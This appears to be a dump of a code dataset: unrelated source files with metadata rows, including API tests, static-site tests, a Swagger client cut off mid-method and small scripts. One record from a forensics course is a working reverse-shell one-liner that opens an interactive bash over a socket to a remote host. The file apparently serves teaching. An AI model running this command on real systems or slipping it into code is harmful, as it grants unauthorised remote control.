    # The returned record must match the requested id.
    assert "id" in guest
    assert guest["id"] == guest_id
    for key in ("name", "slug"):
        assert key in guest
@pytest.mark.parametrize("guest_slug", ["tom-hanks"])
def test_guests_slug(guest_slug: str):
    """Test /v2.0/guests/slug/{guest_slug} route"""
    resp = client.get(f"/v{API_VERSION}/guests/slug/{guest_slug}")
    guest = resp.json()
    assert resp.status_code == 200
    for key in ("id", "name", "slug"):
        assert key in guest
    # The returned record must match the requested slug.
    assert guest["slug"] == guest_slug
def test_guests_details():
    """Test /v2.0/guests/details route"""
    resp = client.get(f"/v{API_VERSION}/guests/details")
    payload = resp.json()
    assert resp.status_code == 200
    assert "guests" in payload
    # Details mode adds the appearances list to the basic fields.
    first = payload["guests"][0]
    for key in ("id", "name", "slug", "appearances"):
        assert key in first
@pytest.mark.parametrize("guest_id", [54])
def test_guests_details_id(guest_id: int):
    """Test /v2.0/guests/details/id/{guest_id} route"""
    resp = client.get(f"/v{API_VERSION}/guests/details/id/{guest_id}")
    guest = resp.json()
    assert resp.status_code == 200
    # The returned record must match the requested id and include appearances.
    assert "id" in guest
    assert guest["id"] == guest_id
    for key in ("name", "slug", "appearances"):
        assert key in guest
@pytest.mark.parametrize("guest_slug", ["tom-hanks"])
def test_guests_details_slug(guest_slug: str):
    """Test /v2.0/guests/details/slug/{guest_slug} route"""
    resp = client.get(f"/v{API_VERSION}/guests/details/slug/{guest_slug}")
    guest = resp.json()
    assert resp.status_code == 200
    for key in ("id", "name", "slug"):
        assert key in guest
    # The returned record must match the requested slug and include appearances.
    assert guest["slug"] == guest_slug
    assert "appearances" in guest
| 27.734694
| 78
| 0.672553
| 394
| 2,718
| 4.522843
| 0.15736
| 0.054994
| 0.080247
| 0.058923
| 0.820988
| 0.790685
| 0.790685
| 0.790685
| 0.730079
| 0.704265
| 0
| 0.024172
| 0.178072
| 2,718
| 97
| 79
| 28.020619
| 0.7735
| 0.140545
| 0
| 0.7
| 0
| 0
| 0.188507
| 0.095777
| 0
| 0
| 0
| 0
| 0.55
| 1
| 0.1
| false
| 0
| 0.066667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b7df34ef0f8f02df1c1ff4889628631414c8c972
| 205
|
py
|
Python
|
src/factory.py
|
jamie-sgro/url-shortener
|
c833ab81927d9267a4012be0eba0e8a6409d7a85
|
[
"MIT"
] | null | null | null |
src/factory.py
|
jamie-sgro/url-shortener
|
c833ab81927d9267a4012be0eba0e8a6409d7a85
|
[
"MIT"
] | 15
|
2021-09-04T16:21:46.000Z
|
2021-09-13T14:59:31.000Z
|
src/factory.py
|
jamie-sgro/url-shortener
|
c833ab81927d9267a4012be0eba0e8a6409d7a85
|
[
"MIT"
] | null | null | null |
from src.database.i_db_accessor import IDbAccessor
from src.database.db_accessor import DbAccessor
class Factory:
    """Central creation point for database-accessor implementations."""

    @staticmethod
    def create_db_accessor() -> IDbAccessor:
        """Return the concrete accessor type (the class itself — it is not
        instantiated here; callers receive ``DbAccessor`` to construct or use)."""
        return DbAccessor
| 22.777778
| 50
| 0.77561
| 25
| 205
| 6.16
| 0.6
| 0.194805
| 0.194805
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170732
| 205
| 8
| 51
| 25.625
| 0.905882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0.333333
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
4d44bfa1f9122d2847c39289477578e12664366c
| 230
|
py
|
Python
|
Section 5/reverse_shell.py
|
PacktPublishing/Recipes-to-Successful-Python-Digital-Forensics
|
3217906559dddd80d88b2e774f13f90bf3d3caea
|
[
"MIT"
] | 13
|
2018-11-14T15:54:04.000Z
|
2021-12-19T17:19:58.000Z
|
Section 5/reverse_shell.py
|
PacktPublishing/Recipes-to-Successful-Python-Digital-Forensics
|
3217906559dddd80d88b2e774f13f90bf3d3caea
|
[
"MIT"
] | null | null | null |
Section 5/reverse_shell.py
|
PacktPublishing/Recipes-to-Successful-Python-Digital-Forensics
|
3217906559dddd80d88b2e774f13f90bf3d3caea
|
[
"MIT"
] | 10
|
2018-12-10T06:10:03.000Z
|
2022-01-21T03:59:51.000Z
|
# NOTE(review): reverse-shell one-liner — appears to be educational material
# from a digital-forensics course. It connects OUT to 192.168.56.1:1234,
# duplicates the socket onto stdin/stdout/stderr and spawns an interactive
# /bin/bash bound to it. Never run outside an isolated lab network.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
| 230
| 230
| 0.695652
| 43
| 230
| 3.674419
| 0.604651
| 0.113924
| 0.132911
| 0.246835
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084444
| 0.021739
| 230
| 1
| 230
| 230
| 0.617778
| 0
| 0
| 0
| 0
| 1
| 0.943723
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 1
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
4ddae177c2ceaad52bdd3c2b55d7250cc0ead1a5
| 125
|
py
|
Python
|
sololearn/EasterEggs/EasterEggs.py
|
SneakyWizards/HackerRankSolutions
|
daf494e7775bb0de5afcfdcfd45aa73e6a950e0e
|
[
"RSA-MD"
] | 3
|
2020-01-08T18:33:11.000Z
|
2022-02-08T00:38:26.000Z
|
sololearn/EasterEggs/EasterEggs.py
|
SneakyWizards/HackerRankSolutions
|
daf494e7775bb0de5afcfdcfd45aa73e6a950e0e
|
[
"RSA-MD"
] | null | null | null |
sololearn/EasterEggs/EasterEggs.py
|
SneakyWizards/HackerRankSolutions
|
daf494e7775bb0de5afcfdcfd45aa73e6a950e0e
|
[
"RSA-MD"
] | 4
|
2020-08-08T22:02:23.000Z
|
2022-02-07T17:40:15.000Z
|
#!/usr/bin/python
# Read three integers from stdin, in order; print "Candy Time" when the
# first minus the second equals the third, otherwise "Keep Hunting".
minuend = int(input())
subtrahend = int(input())
expected_difference = int(input())
if minuend - subtrahend == expected_difference:
    print("Candy Time")
else:
    print("Keep Hunting")
| 17.857143
| 49
| 0.576
| 17
| 125
| 4.235294
| 0.705882
| 0.333333
| 0.305556
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.168
| 125
| 6
| 50
| 20.833333
| 0.692308
| 0.128
| 0
| 0
| 0
| 0
| 0.203704
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
4de5809dd3f74cb7ac057156578712691c645fe1
| 27
|
py
|
Python
|
src/models/CCIG/models/__init__.py
|
stillyuyi/ArticlePairMatching
|
f9cf63ad4c398d377f3d0291f552fb99f81020ef
|
[
"BSD-3-Clause"
] | 227
|
2019-05-22T14:10:55.000Z
|
2022-03-31T07:39:31.000Z
|
src/models/CCIG/models/__init__.py
|
stillyuyi/ArticlePairMatching
|
f9cf63ad4c398d377f3d0291f552fb99f81020ef
|
[
"BSD-3-Clause"
] | 35
|
2019-06-18T07:39:28.000Z
|
2021-11-19T03:51:07.000Z
|
src/models/CCIG/models/__init__.py
|
stillyuyi/ArticlePairMatching
|
f9cf63ad4c398d377f3d0291f552fb99f81020ef
|
[
"BSD-3-Clause"
] | 62
|
2019-06-14T07:10:30.000Z
|
2022-02-04T19:59:32.000Z
|
from .se_gcn import SE_GCN
| 13.5
| 26
| 0.814815
| 6
| 27
| 3.333333
| 0.666667
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 27
| 1
| 27
| 27
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1297db94e85d81c93e313888a5c420af6ef846fe
| 2,170
|
py
|
Python
|
cactus/tests/test_legacy_context.py
|
jacobmarshall-etc/Cactus
|
398ed4a1f57d0aa84fe3b297d7d27d0703683637
|
[
"BSD-3-Clause"
] | 1,048
|
2016-06-04T07:37:40.000Z
|
2022-03-06T02:03:16.000Z
|
cactus/tests/test_legacy_context.py
|
jacobmarshall-etc/Cactus
|
398ed4a1f57d0aa84fe3b297d7d27d0703683637
|
[
"BSD-3-Clause"
] | 49
|
2016-06-11T18:53:40.000Z
|
2021-09-29T07:07:53.000Z
|
cactus/tests/test_legacy_context.py
|
kamalx/Cactus
|
8badeff999b9e63092eef0bac2d33d1e6d7c50ed
|
[
"BSD-3-Clause"
] | 153
|
2016-06-04T08:55:22.000Z
|
2021-11-12T17:35:51.000Z
|
#coding:utf-8
import os
from cactus.tests import SiteTestCase
class TestLegacyContext(SiteTestCase):
    """Tests for the legacy template context variables.

    Each source page contains exactly one legacy variable ({{ STATIC_URL }},
    {{ ROOT_URL }} or {{ PAGE_URL }}); after a build, the rendered output must
    be the relative URL appropriate for the page's location in the site.
    """

    def _write_page(self, body, *parts):
        """Create a source page at page_path/<parts> containing `body`."""
        with open(os.path.join(self.site.page_path, *parts), "w") as f:
            f.write(body)

    def _assert_rendered(self, expected, *parts):
        """Assert that the built page at build_path/<parts> rendered to exactly `expected`."""
        with open(os.path.join(self.site.build_path, *parts)) as f:
            self.assertEqual(f.read(), expected)

    def setUp(self):
        super(TestLegacyContext, self).setUp()
        os.mkdir(os.path.join(self.site.page_path, "test"))
        # One page per legacy variable, at the site root and one level down.
        self._write_page("{{ STATIC_URL }}", "static.html")
        self._write_page("{{ STATIC_URL }}", "test", "static.html")
        self._write_page("{{ ROOT_URL }}", "root.html")
        self._write_page("{{ ROOT_URL }}", "test", "root.html")
        self._write_page("{{ PAGE_URL }}", "page.html")

    def test_context(self):
        """Default build: URLs are relative to the page's directory depth."""
        self.site.build()
        self._assert_rendered("./static", "static.html")
        self._assert_rendered("../static", "test", "static.html")
        self._assert_rendered(".", "root.html")
        self._assert_rendered("..", "test", "root.html")
        self._assert_rendered("page.html", "page.html")

    def test_pretty_urls(self):
        """With prettify_urls, pages build to <name>/index.html, one level deeper."""
        self.site.prettify_urls = True
        self.site.build()
        self._assert_rendered("../../static", "test", "static", "index.html")
        self._assert_rendered("..", "root", "index.html")
        self._assert_rendered("../..", "test", "root", "index.html")
        self._assert_rendered("page/", "page", "index.html")
| 35.57377
| 91
| 0.578341
| 309
| 2,170
| 3.983819
| 0.12945
| 0.116978
| 0.121852
| 0.170593
| 0.82697
| 0.82697
| 0.815597
| 0.815597
| 0.732738
| 0.705118
| 0
| 0.000597
| 0.22765
| 2,170
| 60
| 92
| 36.166667
| 0.73389
| 0.00553
| 0
| 0.205128
| 0
| 0
| 0.1465
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 1
| 0.076923
| false
| 0
| 0.051282
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
12c6ed49569bad6f213336433163250bfbfba61a
| 38,114
|
py
|
Python
|
swagger_codegen/swagger_client/api/default_api.py
|
DivSeek-Canada/divseek_mvp_api
|
2db16bc5b29acf2a7abea615270738e964e9368a
|
[
"MIT"
] | null | null | null |
swagger_codegen/swagger_client/api/default_api.py
|
DivSeek-Canada/divseek_mvp_api
|
2db16bc5b29acf2a7abea615270738e964e9368a
|
[
"MIT"
] | null | null | null |
swagger_codegen/swagger_client/api/default_api.py
|
DivSeek-Canada/divseek_mvp_api
|
2db16bc5b29acf2a7abea615270738e964e9368a
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Divseek Canada MVP application API
Implements all the calls necessary for finding genomic markers for germplasm, but doesn't conform to BrAPI. # noqa: E501
OpenAPI spec version: 0.0.1
Contact: apiteam@swagger.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class DefaultApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Create the API facade; builds a fresh ApiClient when none is injected."""
    self.api_client = api_client if api_client is not None else ApiClient()
def get_germplasm(self, **kwargs):  # noqa: E501
    """Returns all germplasm we have  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_germplasm(async=True)
    >>> result = thread.get()

    :param async bool
    :return: list[Germplasm]
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Both the async and the sync path return the delegate's result directly;
    # the original only differed in whether the value was rebound first.
    return self.get_germplasm_with_http_info(**kwargs)  # noqa: E501
def get_germplasm_with_http_info(self, **kwargs):  # noqa: E501
    """Returns all germplasm we have  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_germplasm_with_http_info(async=True)
    >>> result = thread.get()

    :param async bool
    :return: list[Germplasm]
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['async', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501

    params = locals()
    # Reject unexpected keyword arguments early with a clear error.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_germplasm" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # BUG FIX: `async` is a reserved word since Python 3.7, so it can no longer
    # appear as an explicit keyword argument (SyntaxError). Passing it via dict
    # unpacking keeps the parameter name seen by call_api unchanged.
    return self.api_client.call_api(
        '/germplasm/', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[Germplasm]',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
def get_germplasm_by_id(self, id, **kwargs):  # noqa: E501
    """Returns all germplasm we have  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_germplasm_by_id(id, async=True)
    >>> result = thread.get()

    :param async bool
    :param str id: Unique database ID for the germplasm (required)
    :return: Germplasm
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Both the async and the sync path return the delegate's result directly;
    # the original only differed in whether the value was rebound first.
    return self.get_germplasm_by_id_with_http_info(id, **kwargs)  # noqa: E501
def get_germplasm_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Returns all germplasm we have  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_germplasm_by_id_with_http_info(id, async=True)
    >>> result = thread.get()

    :param async bool
    :param str id: Unique database ID for the germplasm (required)
    :return: Germplasm
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['id', 'async', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501

    params = locals()
    # Reject unexpected keyword arguments early with a clear error.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_germplasm_by_id" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `get_germplasm_by_id`")  # noqa: E501

    collection_formats = {}
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # BUG FIX: `async` is a reserved word since Python 3.7, so it can no longer
    # appear as an explicit keyword argument (SyntaxError). Passing it via dict
    # unpacking keeps the parameter name seen by call_api unchanged.
    return self.api_client.call_api(
        '/germplasm/{id}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Germplasm',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
def get_germplasm_by_taxon(self, id, **kwargs):  # noqa: E501
    """Returns all germplasm we have by taxon  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_germplasm_by_taxon(id, async=True)
    >>> result = thread.get()

    :param async bool
    :param str id: Unique database ID for the taxon (required)
    :return: Germplasm
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Both the async and the sync path return the delegate's result directly;
    # the original only differed in whether the value was rebound first.
    return self.get_germplasm_by_taxon_with_http_info(id, **kwargs)  # noqa: E501
def get_germplasm_by_taxon_with_http_info(self, id, **kwargs):  # noqa: E501
    """Returns all germplasm we have by taxon  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_germplasm_by_taxon_with_http_info(id, async=True)
    >>> result = thread.get()

    :param async bool
    :param str id: Unique database ID for the taxon (required)
    :return: Germplasm
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unexpected keyword argument.
    :raises ValueError: when the required `id` is missing or None.
    """
    all_params = ['id']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # `.items()` is equivalent to `six.iteritems` on both Python 2 and 3
    # and removes the py2-only dependency from this method.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_germplasm_by_taxon" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `get_germplasm_by_taxon`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # `async` became a reserved word in Python 3.7, so it cannot appear
    # as a literal keyword argument; splatting a dict delivers the same
    # keyword to call_api while staying syntactically valid.
    return self.api_client.call_api(
        '/germplasm/taxon/{id}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Germplasm',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
def get_locus_by_qtl(self, id, **kwargs):  # noqa: E501
    """Returns all phenotypes for a germplasm that we have  # noqa: E501

    Synchronous by default; passing async=True makes the underlying
    request asynchronous and returns the request thread instead of the
    response payload.

    >>> thread = api.get_locus_by_qtl(id, async=True)
    >>> result = thread.get()

    :param async bool
    :param str id: Unique database ID for the QTL (required)
    :return: Locus
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: only the deserialized payload is wanted.
    kwargs['_return_http_data_only'] = True
    return self.get_locus_by_qtl_with_http_info(id, **kwargs)  # noqa: E501
def get_locus_by_qtl_with_http_info(self, id, **kwargs):  # noqa: E501
    """Returns all phenotypes for a germplasm that we have  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_locus_by_qtl_with_http_info(id, async=True)
    >>> result = thread.get()

    :param async bool
    :param str id: Unique database ID for the QTL (required)
    :return: Locus
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unexpected keyword argument.
    :raises ValueError: when the required `id` is missing or None.
    """
    all_params = ['id']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # `.items()` is equivalent to `six.iteritems` on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_locus_by_qtl" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `get_locus_by_qtl`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # `async` is reserved on Python 3.7+; dict-splat keeps the same
    # keyword reaching call_api without the syntax error.
    return self.api_client.call_api(
        '/locus/qtl/{id}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Locus',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
def get_locus_by_taxon(self, id, **kwargs):  # noqa: E501
    """Returns all phenotypes for a germplasm that we have  # noqa: E501

    Synchronous by default; passing async=True makes the underlying
    request asynchronous and returns the request thread instead of the
    response payload.

    >>> thread = api.get_locus_by_taxon(id, async=True)
    >>> result = thread.get()

    :param async bool
    :param str id: Unique database ID for the taxon (required)
    :return: list[Locus]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: only the deserialized payload is wanted.
    kwargs['_return_http_data_only'] = True
    return self.get_locus_by_taxon_with_http_info(id, **kwargs)  # noqa: E501
def get_locus_by_taxon_with_http_info(self, id, **kwargs):  # noqa: E501
    """Returns all phenotypes for a germplasm that we have  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_locus_by_taxon_with_http_info(id, async=True)
    >>> result = thread.get()

    :param async bool
    :param str id: Unique database ID for the taxon (required)
    :return: list[Locus]
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unexpected keyword argument.
    :raises ValueError: when the required `id` is missing or None.
    """
    all_params = ['id']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # `.items()` is equivalent to `six.iteritems` on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_locus_by_taxon" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `get_locus_by_taxon`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # `async` is reserved on Python 3.7+; dict-splat keeps the same
    # keyword reaching call_api without the syntax error.
    return self.api_client.call_api(
        '/locus/taxon/{id}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[Locus]',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
def get_qt_ls(self, **kwargs):  # noqa: E501
    """Returns all the QTLs (Quantitative Trait Loci) we have  # noqa: E501

    Synchronous by default; passing async=True makes the underlying
    request asynchronous and returns the request thread instead of the
    response payload.

    >>> thread = api.get_qt_ls(async=True)
    >>> result = thread.get()

    :param async bool
    :return: list[QTL]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: only the deserialized payload is wanted.
    kwargs['_return_http_data_only'] = True
    return self.get_qt_ls_with_http_info(**kwargs)  # noqa: E501
def get_qt_ls_with_http_info(self, **kwargs):  # noqa: E501
    """Returns all the QTLs (Quantitative Trait Loci) we have  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_qt_ls_with_http_info(async=True)
    >>> result = thread.get()

    :param async bool
    :return: list[QTL]
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unexpected keyword argument.
    """
    all_params = []  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # `.items()` is equivalent to `six.iteritems` on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_qt_ls" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # `async` is reserved on Python 3.7+; dict-splat keeps the same
    # keyword reaching call_api without the syntax error.
    return self.api_client.call_api(
        '/qtl/', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[QTL]',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
def get_qtl_by_germplasm_trait(self, germplasm_id, trait_id, **kwargs):  # noqa: E501
    """Returns all phenotypes for a germplasm that we have  # noqa: E501

    Synchronous by default; passing async=True makes the underlying
    request asynchronous and returns the request thread instead of the
    response payload.

    >>> thread = api.get_qtl_by_germplasm_trait(germplasm_id, trait_id, async=True)
    >>> result = thread.get()

    :param async bool
    :param str germplasm_id: Unique database ID for the germplasm (required)
    :param str trait_id: Unique database ID for the trait in question (required)
    :return: list[QTL]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: only the deserialized payload is wanted.
    kwargs['_return_http_data_only'] = True
    return self.get_qtl_by_germplasm_trait_with_http_info(germplasm_id, trait_id, **kwargs)  # noqa: E501
def get_qtl_by_germplasm_trait_with_http_info(self, germplasm_id, trait_id, **kwargs):  # noqa: E501
    """Returns all phenotypes for a germplasm that we have  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_qtl_by_germplasm_trait_with_http_info(germplasm_id, trait_id, async=True)
    >>> result = thread.get()

    :param async bool
    :param str germplasm_id: Unique database ID for the germplasm (required)
    :param str trait_id: Unique database ID for the trait in question (required)
    :return: list[QTL]
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unexpected keyword argument.
    :raises ValueError: when a required parameter is missing or None.

